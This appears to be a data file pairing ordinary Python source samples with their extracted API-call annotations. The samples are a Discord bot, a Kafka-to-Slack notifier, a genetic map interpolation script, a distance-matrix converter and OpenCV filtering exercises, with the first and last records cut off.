mass.type = rule.type
mass.save()
def int_to_day_of_week(day_int):
weekday_map = {
0: "mon",
1: "tue",
2: "wed",
3: "thu",
4: "fri",
5: "sat",
6: "sun",
}
return weekday_map[day_int]
def convert_to_localtime(utctime):
utc = utctime.replace(tzinfo=pytz.UTC)
localtz = utc.astimezone(timezone.get_current_timezone())
return localtz
|
[
"messdiener.models.Mass.objects.filter",
"django.utils.timezone.get_current_timezone",
"messdiener.models.Type.objects.all"
] |
[((319, 337), 'messdiener.models.Type.objects.all', 'Type.objects.all', ([], {}), '()\n', (335, 337), False, 'from messdiener.models import Mass, Type\n'), ((1229, 1260), 'django.utils.timezone.get_current_timezone', 'timezone.get_current_timezone', ([], {}), '()\n', (1258, 1260), False, 'from django.utils import timezone\n'), ((351, 384), 'messdiener.models.Mass.objects.filter', 'Mass.objects.filter', ([], {'plan': 'plan_pk'}), '(plan=plan_pk)\n', (370, 384), False, 'from messdiener.models import Mass, Type\n'), ((189, 222), 'messdiener.models.Mass.objects.filter', 'Mass.objects.filter', ([], {'plan': 'plan_pk'}), '(plan=plan_pk)\n', (208, 222), False, 'from messdiener.models import Mass, Type\n')]
|
import json
import os
from discord.ext import commands
with open(os.getcwd() + '/resources/Setting.json', mode='r',
encoding='utf8') as Setting_Json:
Setting_Json_data = json.load(Setting_Json)
pybot = commands.Bot(command_prefix='r?')
@pybot.event
async def on_ready():
print("debug code 0")
for filename in os.listdir(os.getcwd() + '/Commands'):
print('Commands.'+filename[:-3])
if not filename.endswith('.py'):
continue
pybot.load_extension('Commands.'+filename[:-3])
if __name__ == '__main__':
pybot.run(Setting_Json_data['token'])
|
[
"os.getcwd",
"json.load",
"discord.ext.commands.Bot"
] |
[((218, 251), 'discord.ext.commands.Bot', 'commands.Bot', ([], {'command_prefix': '"""r?"""'}), "(command_prefix='r?')\n", (230, 251), False, 'from discord.ext import commands\n'), ((185, 208), 'json.load', 'json.load', (['Setting_Json'], {}), '(Setting_Json)\n', (194, 208), False, 'import json\n'), ((343, 354), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (352, 354), False, 'import os\n'), ((66, 77), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (75, 77), False, 'import os\n')]
|
import json
import os
import time
from confluent_kafka import Consumer, KafkaError
from slack import WebClient
from slack.errors import SlackApiError
# Bot User OAuth Access Token
# Scope = chat:write
token = os.environ["SLACK_BOT_TOKEN"]
sc = WebClient(token)
# Set 'auto.offset.reset': 'smallest' if you want to consume all messages
# from the beginning of the topic
settings = {
"bootstrap.servers": "localhost:9092",
"group.id": "kafka-notify",
"default.topic.config": {"auto.offset.reset": "largest"},
}
c = Consumer(settings)
# Topic = "SLACK-KAFKA"
c.subscribe(["SLACK-KAFKA"])
# TODO: Make bolts with Apache Storm
try:
while True:
msg = c.poll(0.1) # read data
time.sleep(5)
if msg is None:
continue
elif not msg.error():
print("Received message: {0}".format(msg.value()))
if msg.value() is None:
continue
try:
app_msg = json.loads(msg.value().decode())
except:
app_msg = json.loads(msg.value())
try:
user = app_msg["USER"]
message = app_msg["TEXT"]
channel = "kafka"
text = (
"`%s` found a bug :\n> %s\n\n_Please see if we can fix the issue *right here, right now*_"
% (user, message)
)
print('\nSending message "%s" to channel %s' % (text, channel))
except SlackApiError as e:
print("Failed to get channel/text from message.")
print(e.response["error"])
channel = "general"
text = msg.value()
try:
sc_response = sc.chat_postMessage(channel=channel, text=text,)
except SlackApiError as e:
assert e.response["ok"] is False
print("\t** FAILED: %s" % e.response["error"])
elif msg.error().code() == KafkaError._PARTITION_EOF:
print(
"End of partition reached {0}/{1}".format(msg.topic(), msg.partition())
)
else:
print("Error occured: {0}".format(msg.error().str()))
except Exception as e:
print(type(e))
print(dir(e))
finally:
c.close()
|
[
"slack.WebClient",
"confluent_kafka.Consumer",
"time.sleep"
] |
[((248, 264), 'slack.WebClient', 'WebClient', (['token'], {}), '(token)\n', (257, 264), False, 'from slack import WebClient\n'), ((530, 548), 'confluent_kafka.Consumer', 'Consumer', (['settings'], {}), '(settings)\n', (538, 548), False, 'from confluent_kafka import Consumer, KafkaError\n'), ((709, 722), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (719, 722), False, 'import time\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 17 14:53:05 2017
@author: manu
Step 1 : Modify the 1KGP OMNI maps to have same physical positions(bp) by interpolation
"""
import pandas as pd
import os
from scipy.interpolate import interp1d
import numpy as np
omni="../OMNI/" #Relative path to the 1KGP OMNI maps
omni_new="../OMNI_INTERPOLATED/" #Relative path for creating the interpolated maps
positions={}
maps={}
for pop in os.listdir(omni):
maps[pop]={}
print("Reading",pop)
for chrom in os.listdir(omni+pop):
tmap=pd.read_table(omni+pop+"/"+chrom, header=0,names=["pos","rate","map","filter"]) #Reading maps into dataframes
tmap=tmap[tmap["filter"]==0] #Removing filtered positions
maps[pop][chrom]=tmap
if not chrom in positions.keys():
positions[chrom]=[]
positions[chrom]=list(set(positions[chrom]+list(tmap["pos"]))) #Creating a union set of positions from all the maps
for chrom in positions.keys():
positions[chrom]=sorted(positions[chrom]) #Sorting the chromosome-wise markers by genomic locations
#%%
if not os.path.exists(omni_new):
os.makedirs(omni_new) #creating directories
#%%
for pop in os.listdir(omni):
print("Computing interpolated map:",pop)
if not os.path.exists(omni_new+pop):
os.makedirs(omni_new+pop)
for chrom in os.listdir(omni+pop):
tmap=maps[pop][chrom]
fmap=interp1d(tmap["pos"],tmap["map"]) #interpolating function
nmap=pd.DataFrame(columns=["chr","pos"])
nmap["pos"]=positions[chrom]
nmap["chr"]=chrom[:-4]
nmap=pd.merge(nmap,tmap[["pos","map"]],how="left",on="pos") #copying map values where positions are equal
nmap.loc[(nmap["map"].isnull()) & (nmap["pos"]<tmap["pos"].iloc[0]),"map"]=0 #setting map units as 0 for positions preceeding the map
nmap.loc[(nmap["map"].isnull()) & (nmap["pos"]>tmap["pos"].iloc[-1]),"map"]=tmap["map"].iloc[-1] #setting map units as the highest map unit for positions exceeding the map
nmap.loc[(nmap["map"].isnull()),"map"]=fmap(nmap.loc[(nmap["map"].isnull()),"pos"]) #interpolating for the rest
nmap["rate"]=list(np.diff(nmap["map"])/(np.diff(nmap["pos"])/1e6))+[0] #calculating rate for all the intervals
nmap=nmap.round(6)
nmap.to_csv(omni_new+pop+"/"+chrom, sep="\t", index=False,columns=["chr","pos","rate","map"]) #writing the interpolated map
print("Done!")
|
[
"pandas.DataFrame",
"os.makedirs",
"pandas.merge",
"os.path.exists",
"numpy.diff",
"pandas.read_table",
"scipy.interpolate.interp1d",
"os.listdir"
] |
[((474, 490), 'os.listdir', 'os.listdir', (['omni'], {}), '(omni)\n', (484, 490), False, 'import os\n'), ((1431, 1447), 'os.listdir', 'os.listdir', (['omni'], {}), '(omni)\n', (1441, 1447), False, 'import os\n'), ((551, 573), 'os.listdir', 'os.listdir', (['(omni + pop)'], {}), '(omni + pop)\n', (561, 573), False, 'import os\n'), ((1273, 1297), 'os.path.exists', 'os.path.exists', (['omni_new'], {}), '(omni_new)\n', (1287, 1297), False, 'import os\n'), ((1311, 1332), 'os.makedirs', 'os.makedirs', (['omni_new'], {}), '(omni_new)\n', (1322, 1332), False, 'import os\n'), ((1590, 1612), 'os.listdir', 'os.listdir', (['(omni + pop)'], {}), '(omni + pop)\n', (1600, 1612), False, 'import os\n'), ((586, 679), 'pandas.read_table', 'pd.read_table', (["(omni + pop + '/' + chrom)"], {'header': '(0)', 'names': "['pos', 'rate', 'map', 'filter']"}), "(omni + pop + '/' + chrom, header=0, names=['pos', 'rate',\n 'map', 'filter'])\n", (599, 679), True, 'import pandas as pd\n'), ((1505, 1535), 'os.path.exists', 'os.path.exists', (['(omni_new + pop)'], {}), '(omni_new + pop)\n', (1519, 1535), False, 'import os\n'), ((1547, 1574), 'os.makedirs', 'os.makedirs', (['(omni_new + pop)'], {}), '(omni_new + pop)\n', (1558, 1574), False, 'import os\n'), ((1655, 1689), 'scipy.interpolate.interp1d', 'interp1d', (["tmap['pos']", "tmap['map']"], {}), "(tmap['pos'], tmap['map'])\n", (1663, 1689), False, 'from scipy.interpolate import interp1d\n'), ((1774, 1810), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['chr', 'pos']"}), "(columns=['chr', 'pos'])\n", (1786, 1810), True, 'import pandas as pd\n'), ((1891, 1949), 'pandas.merge', 'pd.merge', (['nmap', "tmap[['pos', 'map']]"], {'how': '"""left"""', 'on': '"""pos"""'}), "(nmap, tmap[['pos', 'map']], how='left', on='pos')\n", (1899, 1949), True, 'import pandas as pd\n'), ((2509, 2529), 'numpy.diff', 'np.diff', (["nmap['map']"], {}), "(nmap['map'])\n", (2516, 2529), True, 'import numpy as np\n'), ((2531, 2551), 'numpy.diff', 'np.diff', (["nmap['pos']"], {}), "(nmap['pos'])\n", (2538, 2551), True, 'import numpy as np\n')]
|
"""
Terminal info.
"""
import platform
import struct
# pylint: disable=invalid-name
try:
if platform.system() == 'Windows': # pragma: no cover (windows)
from ctypes import windll, create_string_buffer
fcntl, termios = None, None
else:
import fcntl
import termios
windll, create_string_buffer = None, None
except ImportError:
fcntl, termios = None, None
windll, create_string_buffer = None, None
DEFAULT_LINE_WIDTH = 78
MAX_LINE_WIDTH = 120
def term_width():
"""
Return the column width of the terminal, or ``None`` if it can't be
determined.
"""
if fcntl and termios:
try:
winsize = fcntl.ioctl(0, termios.TIOCGWINSZ, ' ')
_, width = struct.unpack('hh', winsize)
return width
except IOError:
pass
elif windll and create_string_buffer: # pragma: no cover (windows)
stderr_handle, struct_size = -12, 22
handle = windll.kernel32.GetStdHandle(stderr_handle)
csbi = create_string_buffer(struct_size)
res = windll.kernel32.GetConsoleScreenBufferInfo(handle, csbi)
if res:
(_, _, _, _, _, left, _, right, _,
_, _) = struct.unpack('hhhhHhhhhhh', csbi.raw)
return right - left + 1
else:
return 0 # console screen buffer not available
def line_width(default_width=DEFAULT_LINE_WIDTH, max_width=MAX_LINE_WIDTH):
"""
Return the ideal column width for the output from :func:`see.see`, taking
the terminal width into account to avoid wrapping.
"""
width = term_width()
if width: # pragma: no cover (no terminal info in Travis CI)
return min(width, max_width)
else:
return default_width
|
[
"fcntl.ioctl",
"struct.unpack",
"ctypes.windll.kernel32.GetStdHandle",
"ctypes.create_string_buffer",
"ctypes.windll.kernel32.GetConsoleScreenBufferInfo",
"platform.system"
] |
[((99, 116), 'platform.system', 'platform.system', ([], {}), '()\n', (114, 116), False, 'import platform\n'), ((687, 729), 'fcntl.ioctl', 'fcntl.ioctl', (['(0)', 'termios.TIOCGWINSZ', '""" """'], {}), "(0, termios.TIOCGWINSZ, ' ')\n", (698, 729), False, 'import fcntl\n'), ((753, 781), 'struct.unpack', 'struct.unpack', (['"""hh"""', 'winsize'], {}), "('hh', winsize)\n", (766, 781), False, 'import struct\n'), ((982, 1025), 'ctypes.windll.kernel32.GetStdHandle', 'windll.kernel32.GetStdHandle', (['stderr_handle'], {}), '(stderr_handle)\n', (1010, 1025), False, 'from ctypes import windll, create_string_buffer\n'), ((1041, 1074), 'ctypes.create_string_buffer', 'create_string_buffer', (['struct_size'], {}), '(struct_size)\n', (1061, 1074), False, 'from ctypes import windll, create_string_buffer\n'), ((1089, 1145), 'ctypes.windll.kernel32.GetConsoleScreenBufferInfo', 'windll.kernel32.GetConsoleScreenBufferInfo', (['handle', 'csbi'], {}), '(handle, csbi)\n', (1131, 1145), False, 'from ctypes import windll, create_string_buffer\n'), ((1230, 1268), 'struct.unpack', 'struct.unpack', (['"""hhhhHhhhhhh"""', 'csbi.raw'], {}), "('hhhhHhhhhhh', csbi.raw)\n", (1243, 1268), False, 'import struct\n')]
|
from rdflib import URIRef, Namespace
from definednamespace import DefinedNamespace
class RDFMOD(DefinedNamespace):
# http://www.w3.org/1999/02/22-rdf-syntax-ns#Property
comment: URIRef # A description of the subject resource.
domain: URIRef # A domain of the subject property.
isDefinedBy: URIRef # The defininition of the subject resource.
label: URIRef # A human-readable name for the subject.
member: URIRef # A member of the subject resource.
range: URIRef # A range of the subject property.
seeAlso: URIRef # Further information about the subject resource.
subClassOf: URIRef # The subject is a subclass of a class.
subPropertyOf: URIRef # The subject is a subproperty of a property.
# http://www.w3.org/2000/01/rdf-schema#Class
Class: URIRef # The class of classes.
Container: URIRef # The class of RDF containers.
ContainerMembershipProperty: URIRef # The class of container membership properties, rdf:_1, rdf:_2, ..., all of which are sub-properties of 'member'.
Datatype: URIRef # The class of RDF datatypes.
Literal: URIRef # The class of literal values, eg. textual strings and integers.
Resource: URIRef # The class resource, everything.
# Valid non-python identifiers
_extras = ['12345', 'class']
_NS = Namespace("http://www.w3.org/2000/01/rdf-schema#")
|
[
"rdflib.Namespace"
] |
[((1483, 1533), 'rdflib.Namespace', 'Namespace', (['"""http://www.w3.org/2000/01/rdf-schema#"""'], {}), "('http://www.w3.org/2000/01/rdf-schema#')\n", (1492, 1533), False, 'from rdflib import URIRef, Namespace\n')]
|
#!/usr/bin/env python
'''
Author: <NAME>
Date: 23/11/2016
Script to convert pipeline output in MRP matrix format to distance matrix format.
Produces distance matrix file for every tree block in input,
and also a log file for every input file.
Run by using "make sdmdata" command.
Pipeline MRP input:
Tb_ID NCBI_ID charstring (0/1/2)
Distance matrix output:
File for every treeblock:
taxon_count char_count
taxa1 distance distance
taxa2 distance distance
Usage:
-i Input file (Input file (*.dat file from pipeline, containing MRP matrix/matrices))
-o Output directory (for *.sdm files with distance matrices and *.log file)
'''
import argparse
import itertools
import os
import sys
import logging
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
def proc_log(logmessage, logtype, log_file):
if logtype == "inf":
logging.info(logmessage)
log_file.write("INFO: " + logmessage + "\n")
if logtype == "war":
logging.warning(logmessage)
log_file.write("WARNING: " + logmessage + "\n")
def get_tb_tree_dict(treeblock_file):
'''
Input:
Tb_ID NCBI_ID charstring
Output:
dict: key = Tb_ID, value = (dict: key = NCBI_ID, value = charstring)
'''
try:
treeblock_data = dict()
for l in treeblock_file:
l = l.strip().split()
tb_id = l[0]
ncbi_id = l[1]
charstr = l[2]
if tb_id not in treeblock_data:
treeblock_data[tb_id] = dict()
else:
treeblock_data[tb_id][ncbi_id] = charstr
treeblock_data[tb_id][ncbi_id] = charstr
treeblock_file.close()
return(treeblock_data)
except IndexError:
return None
def get_dist_dict(tb_tax_chars):
'''
Input:
dict: key = Tb_ID, value = (dict: key = NCBI_ID, value = charstring),
Output:
dict: key = tuple(taxa_combo), value = Hamming_dist / taxon_count / character_count
'''
try:
distdict = dict()
taxa = sorted(tb_tax_chars.keys())
tax_count = len(taxa)
for combotuple in itertools.product(taxa, repeat=2):
tax1 = combotuple[0]
tax2 = combotuple[1]
charst1 = tb_tax_chars[tax1]
charst2 = tb_tax_chars[tax2]
char_count = len(charst1)
# count indices for positions with diference in characters
dist = len([i for i in range(char_count) if charst1[i] != charst2[i]])
distdict[combotuple] = dist / tax_count / char_count
return(distdict)
except MemoryError:
return None
def write_dist_matrix(distdict, char_count, taxa, distance_file):
'''
Input:
dict: key = taxa_combo_tuple, value = (charstring_1_count_taxon_1 - charstring_1_count_taxon_2),
char_count,
(sorted_)taxa_list
Output:
File for every tree block:
taxon_count char_count
distance_matrix ((charstring_1_count_taxon_1 - charstring_1_count_taxon_2) / taxon_count / char_count)
'''
tax_count = len(taxa)
combo_count = tax_count*tax_count
sorted_distdict = sorted(distdict)
print("\n# {}".format(os.path.basename(distance_file.name)), file=distance_file)
print("\n{} {}".format(tax_count, char_count), file=distance_file)
for t in taxa:
# start matrix row with taxon NCBI_ID
row = [t]
row_count = 0
for taxtuple in sorted_distdict:
# get the right combination of taxa in the right order
if t == taxtuple[0]:
dist = round(distdict[taxtuple], 8)
dist = "{:.8f}".format(dist)
row.append(dist)
else:
row_count += 1
if row_count == combo_count:
break
print(*row, file=distance_file)
def main():
parser = argparse.ArgumentParser(description='Process commandline arguments')
parser.add_argument("-i", type=str,
help="Input file (*.dat file from pipeline, containing MRP matrix/matrices)")
parser.add_argument("-o", type=str,
help="Output directory (for *.sdm files with distance matrices and *.log file)")
args = parser.parse_args()
outname_log = args.o + args.i
outname_log = outname_log.replace(".dat", ".log")
log_file = open(outname_log, "a")
treeblock_file = open(args.i)
proc_log("going to read MRP data from " + args.i, "inf", log_file)
treeblock_data = get_tb_tree_dict(treeblock_file)
if treeblock_data:
for tb in treeblock_data:
WORKdict = treeblock_data[tb]
taxa = sorted(WORKdict.keys())
if len(taxa) > 1:
WORKdict = get_dist_dict(WORKdict)
if WORKdict:
outname_tb = args.o + args.i + "." + tb + ".sdm"
distance_file = open(outname_tb, "w")
proc_log("going to write SDM data to " + outname_tb, "inf", log_file)
char_count = len(treeblock_data[tb][taxa[0]])
write_dist_matrix(WORKdict, char_count, taxa, distance_file)
distance_file.close()
proc_log("done writing " + outname_tb, "inf", log_file)
else:
proc_log("could not calculate distances", "war", log_file)
else:
proc_log("not enough taxa to work with", "war", log_file)
else:
proc_log("invalid MRP format", "war", log_file)
proc_log("done reading " + args.i, "inf", log_file)
log_file.close()
if __name__ == "__main__":
main()
|
[
"argparse.ArgumentParser",
"logging.basicConfig",
"os.path.basename",
"logging.warning",
"logging.info",
"itertools.product"
] |
[((752, 828), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(levelname)s:%(message)s"""', 'level': 'logging.DEBUG'}), "(format='%(levelname)s:%(message)s', level=logging.DEBUG)\n", (771, 828), False, 'import logging\n'), ((3535, 3603), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Process commandline arguments"""'}), "(description='Process commandline arguments')\n", (3558, 3603), False, 'import argparse\n'), ((903, 927), 'logging.info', 'logging.info', (['logmessage'], {}), '(logmessage)\n', (915, 927), False, 'import logging\n'), ((1002, 1029), 'logging.warning', 'logging.warning', (['logmessage'], {}), '(logmessage)\n', (1017, 1029), False, 'import logging\n'), ((2004, 2037), 'itertools.product', 'itertools.product', (['taxa'], {'repeat': '(2)'}), '(taxa, repeat=2)\n', (2021, 2037), False, 'import itertools\n'), ((2962, 2998), 'os.path.basename', 'os.path.basename', (['distance_file.name'], {}), '(distance_file.name)\n', (2978, 2998), False, 'import os\n')]
|
import cv2 as cv
import numpy as np
from matplotlib import pyplot as plt
import random
import time
import sys
def display_image(window_name, img):
"""
Displays image with given window name.
:param window_name: name of the window
:param img: image object to display
"""
cv.imshow(window_name, img)
cv.waitKey(0)
cv.destroyAllWindows()
def my_integral(img):
# insert a border of 1 pixel
img_integ = cv.copyMakeBorder(
img, 1, 1, 1, 1, cv.BORDER_CONSTANT, value=0).astype(np.uint64)
# computation of the integral image
for i in range(img.shape[0] + 1):
for j in range(img.shape[1] + 1):
img_integ[i, j] = (
(img_integ[i, j] + img_integ[i - 1, j]
+ img_integ[i, j - 1] - img_integ[i-1, j-1]))
# remove border of 1 pixel
# at the bottom and right
return img_integ[:-1, :-1]
def mean_4_image(img_mean, yx, w_shape):
# decrease of one the dimension of the window
w_shape = (w_shape[0] - 1, w_shape[1] - 1)
sum = 0
for y in range(yx[0], yx[0] + w_shape[0]):
for x in range(yx[1], yx[1] + w_shape[1]):
sum += img_mean[y, x]
mean = int(sum) // np.size(img_mean)
return mean
def mean_4_integral(img_mean, yx, w_shape):
# decrease of one the dimension of the window
w_shape = (w_shape[0] - 1, w_shape[1] - 1)
a = img_mean[yx[0] + w_shape[0], yx[1] + w_shape[1]]
b = img_mean[yx[0], yx[1] + w_shape[0]]
c = img_mean[yx[0] + w_shape[0], yx[1]]
d = img_mean[yx[0], yx[1]]
sum = (a - b - c + d)
mean = sum / np.size(img_mean)
return mean.astype(np.uint8)
def calc_mean_exec_time(img, func_mean, YX, func_integral=None):
start_time = time.time()
means = []
# if func_integral is None, img_mean is euqual to img
# this because the mean gray value is computed by
# summing up each pixel and not using the integral func
img_mean = func_integral(img) if func_integral else img
for yx in YX:
means.append(func_mean(img_mean, yx, (square_l, square_l)))
print("- run-time: %ss" % (time.time() - start_time))
# we are not outputting the mean gray values because
# it is not required
# print(means)
def max_pwise_error(img1, img2):
# computation of the absolute pixel wise difference
errors = abs(img1.astype(np.int16) -
img2.astype(np.int16))
return errors.max()
def gaussian_blur(img, k_size, sigma):
if k_size == (0, 0):
# get the kernel size extracted by the formula
# at the link https://bit.ly/33xESq3
k_size = int((sigma - 0.35) / 0.15)
# computing the kernel
kernel = np.zeros(k_size)
for y in range(k_size[0]):
for x in range(k_size[1]):
a = (x - (k_size[1]-1)/2)**2
b = (y - (k_size[0]-1)/2)**2
num = -1 * (a + b)
kernel[y, x] = np.exp(num/(2*sigma**2))
# normalization
kernel /= np.sum(kernel)
return cv.filter2D(img, -1, kernel)
def gaussian_blur_w_sep(img, k_size, sigma):
if k_size == (0, 0):
# get the kernel size extracted by the formula
# at the link https://bit.ly/33xESq3
k_size = int((sigma - 0.35) / 0.15)
# computing the kernel Y
kernelY = np.zeros((k_size[0], 1))
for y in range(k_size[0]):
num = -1 * ((y - (k_size[0]-1)/2)**2)
kernelY[y, 0] = np.exp(num/(2*sigma**2))
# computing the kernel X
kernelX = np.zeros(k_size[1])
for x in range(k_size[1]):
num = -1 * ((x - (k_size[1]-1)/2)**2)
kernelX[x] = np.exp(num/(2*sigma**2))
# normalization
kernelY /= np.sum(kernelY[:, 0])
kernelX /= np.sum(kernelX)
# obtaining the final kernel
kernel = kernelY * kernelX
return cv.filter2D(img, -1, kernel)
def salt_n_pepper(img):
img_sp_gaus = img.copy()
# creation of the salt n pepper noise
for y in range(img_sp_gaus.shape[0]):
for x in range(img_sp_gaus.shape[1]):
# access only the 30% of time to the pixel
if random.uniform(0, 1) <= 0.30:
# assign randomly 255 or 0
img_sp_gaus[y, x] = 255 if random.randint(0, 2) else 0
return img_sp_gaus
def distance_mean_gray_val(img1, img2):
mean1 = (np.sum(img1.astype(np.int16)) /
np.size(img1))
mean2 = (np.sum(img2.astype(np.int16)) /
np.size(img2))
return abs(mean1 - mean2)
def filter_SVD(img, kernel):
img_svd = img.copy()
w, u, vt = cv.SVDecomp(kernel)
# getting the highest singular value
i_value = np.argmax(w)
vt = vt[i_value, :].reshape((1, 3))
u = u[:, i_value].reshape((3, 1)) * w[i_value, 0:1]
# filtering the image w/ the obtained kernel
img_svd = cv.sepFilter2D(img_svd, -1, vt, u)
return img_svd
if __name__ == '__main__':
np.seterr(over='ignore')
img_path = sys.argv[1]
# =========================================================================
# ==================== Task 1 =================================
# =========================================================================
print('\nTask 1:')
img = cv.imread(img_path, cv.IMREAD_GRAYSCALE)
# ++++++++++++++++++++++++++++++
# a
# ++++
# the function cv.integrale
img_integ = my_integral(img)
# normalization of the integral
img_integ = ((img_integ - img_integ.min()) /
(img_integ.max() - img_integ.min()) * 255).astype(np.uint8)
display_image('Task 1 - a', img_integ)
# ++++++++++++++++++++++++++++++
# b
# ++++
# Compute the mean grey value
img_integ2 = cv.integral(img)
img_integ3 = my_integral(img)
# summing up each pixel value in the image
mean1 = mean_4_image(img, (0, 0), img.shape)
# computing an integral image using the function cv.integral
mean2 = mean_4_integral(img_integ2, (0, 0), img_integ2.shape)
# computing an integral image with your own function
mean3 = mean_4_integral(img_integ3, (0, 0), img_integ3.shape)
print('Mean grey value of the image (i): ', mean1)
print('Mean grey value of the image (ii): ', mean2)
print('Mean grey value of the image (iii): ', mean3)
# ++++++++++++++++++++++++++++++
# c
# ++++
square_l = 100
# getting the 10 random points
YX = [(random.randint(0, img_integ2.shape[0]-square_l),
random.randint(0, img_integ2.shape[1]-square_l))
for _ in range(10)]
print('Mean gray value w/ 10 random squares (i)', end=' ')
calc_mean_exec_time(img, mean_4_image, YX)
print('Mean gray value w/ 10 random squares (ii)', end=' ')
calc_mean_exec_time(img, mean_4_integral, YX, cv.integral)
print('Mean gray value w/ 10 random squares (iii)', end=' ')
calc_mean_exec_time(img, mean_4_integral, YX, my_integral)
# =========================================================================
# ==================== Task 2 =================================
# =========================================================================
print('\nTask 2:')
img_eqz = cv.equalizeHist(img)
display_image('Equalization', img_eqz)
img_my_eqz = img.copy()
histogram = np.zeros(256)
# histogram creation
for i in range(256):
histogram[i] = np.count_nonzero(img_my_eqz == i)
# Creation of the cumulative distribution function CDF
cdf = np.array([np.sum(histogram[:(i+1)]) for i in range(256)])
# normalization
nr = np.round(((cdf - cdf.min()) / (cdf.max() - cdf.min())) * 255)
for y in range(img.shape[0]):
for x in range(img.shape[1]):
img_my_eqz[y, x] = nr[img[y, x]]
display_image('My equalization', img_my_eqz)
error = max_pwise_error(img_eqz, img_my_eqz)
print('Max pixel wise error (equalization): ', error)
# =========================================================================
# ==================== Task 4 =================================
# =========================================================================
print('\nTask 4:')
sigma = (2 * (2**(1/2)))
k_size = (3, 3)
display_image('Gray image', img)
img_gaus = cv.GaussianBlur(img, k_size, sigma)
display_image('OpenCV gaussian', img_gaus)
img_my_gaus = gaussian_blur(img, k_size, sigma)
display_image('My gaussian', img_my_gaus)
img_my_gaus_sep = gaussian_blur_w_sep(img, k_size, sigma)
display_image('My gaussian w/ separability', img_my_gaus_sep)
# computation maximum pixel wise error
print('Maximum pixel error:')
# OpenCV - MyGaussian
error = max_pwise_error(img_gaus, img_my_gaus)
print('OpenCV - MyGaussian = ', error)
# OpenCV - MyGaussianSep
error = max_pwise_error(img_gaus, img_my_gaus_sep)
print('OpenCV - MyGaussianSep = ', error)
# MyGaussian - MyGaussianSep
error = max_pwise_error(img_my_gaus, img_my_gaus_sep)
print('MyGaussian - MyGaussianSep = ', error)
# =========================================================================
# ==================== Task 5 =================================
# =========================================================================
print('\nTask 5:')
sigma1 = (2)
sigma2 = (2 * (2**(1/2)))
k_size = (0, 0)
img_my_gaus_1 = img.copy()
img_my_gaus_1 = cv.GaussianBlur(
img_my_gaus_1, k_size, sigma1)
img_my_gaus_1 = cv.GaussianBlur(
img_my_gaus_1, k_size, sigma1)
display_image('My gaussian twice', img_my_gaus_1)
img_my_gaus_2 = cv.GaussianBlur(
img, k_size, sigma2)
display_image('My gaussian once', img_my_gaus_2)
# computation maximum pixel error
error = max_pwise_error(img_my_gaus_1, img_my_gaus_2)
print('Maximum pixel error:', error)
# =========================================================================
# ==================== Task 7 =================================
# =========================================================================
print('\nTask 7:')
k_sizes = [7, 9]
img_sp = salt_n_pepper(img)
display_image('Salt n Pepper', img_sp)
# Gaussian filtering
gray_means = []
for k_s in k_sizes:
img_sp_copy = img_sp.copy()
img_sp_gaus = cv.GaussianBlur(img_sp_copy, (k_s, k_s), 0)
distance = distance_mean_gray_val(img, img_sp_gaus)
gray_means.append((distance, k_s, img_sp_gaus))
res = min(gray_means, key=lambda x: x[0])
txt = 'SP gaussian (size: {}, mean: {:0.2f})'.format(
res[1], res[0])
print(txt)
display_image(txt, res[2])
# Median filtering
gray_means = []
for k_s in k_sizes:
img_sp_copy = img_sp.copy()
img_sp_median = cv.medianBlur(img_sp_copy, k_s)
distance = distance_mean_gray_val(img, img_sp_median)
gray_means.append((distance, k_s, img_sp_median))
res = min(gray_means, key=lambda x: x[0])
txt = 'SP median (size: {}, mean: {:0.2f})'.format(
res[1], res[0])
print(txt)
display_image(txt, res[2])
# Bilateral filtering
gray_means = []
for k_s in k_sizes:
img_sp_copy = img_sp.copy()
img_sp_bilateral = cv.bilateralFilter(
img_sp_copy, k_s, 80, 80)
distance = distance_mean_gray_val(img, img_sp_bilateral)
gray_means.append((distance, k_s, img_sp_bilateral))
res = min(gray_means, key=lambda x: x[0])
txt = 'SP bilateral (size: {}, mean: {:0.2f})'.format(
res[1], res[0])
print(txt)
display_image(txt, res[2])
# =========================================================================
# ==================== Task 8 =================================
# =========================================================================
print('\nTask 8:')
kernel1 = np.matrix([
[0.0113, 0.0838, 0.0113],
[0.0838, 0.6193, 0.0838],
[0.0113, 0.0838, 0.0113]])
kernel2 = np.matrix([
[-0.8984, 0.1472, 1.1410],
[-1.9075, 0.1566, 2.1359],
[-0.8659, 0.0573, 1.0337]])
img_k1 = cv.filter2D(img, -1, kernel1)
img_k1_svd = filter_SVD(img, kernel1)
display_image('kernel1', img_k1)
display_image('kernel1 w/ SVD', img_k1_svd)
img_k2 = cv.filter2D(img, -1, kernel2)
img_k2_svd = filter_SVD(img, kernel2)
display_image('kernel2', img_k2)
display_image('kernel2 w/ SVD', img_k2_svd)
# computation of the pixel wise error
error = max_pwise_error(img_k1, img_k1_svd)
print('Pixel wise error w/ kernel1: ', error)
error = max_pwise_error(img_k2, img_k2_svd)
print('Pixel wise error w/ kernel2: ', error)
|
[
"cv2.GaussianBlur",
"cv2.integral",
"numpy.sum",
"numpy.argmax",
"cv2.sepFilter2D",
"cv2.medianBlur",
"cv2.bilateralFilter",
"numpy.exp",
"cv2.imshow",
"random.randint",
"cv2.filter2D",
"cv2.copyMakeBorder",
"cv2.destroyAllWindows",
"cv2.equalizeHist",
"numpy.size",
"cv2.waitKey",
"cv2.SVDecomp",
"numpy.matrix",
"numpy.count_nonzero",
"random.uniform",
"numpy.seterr",
"numpy.zeros",
"time.time",
"cv2.imread"
] |
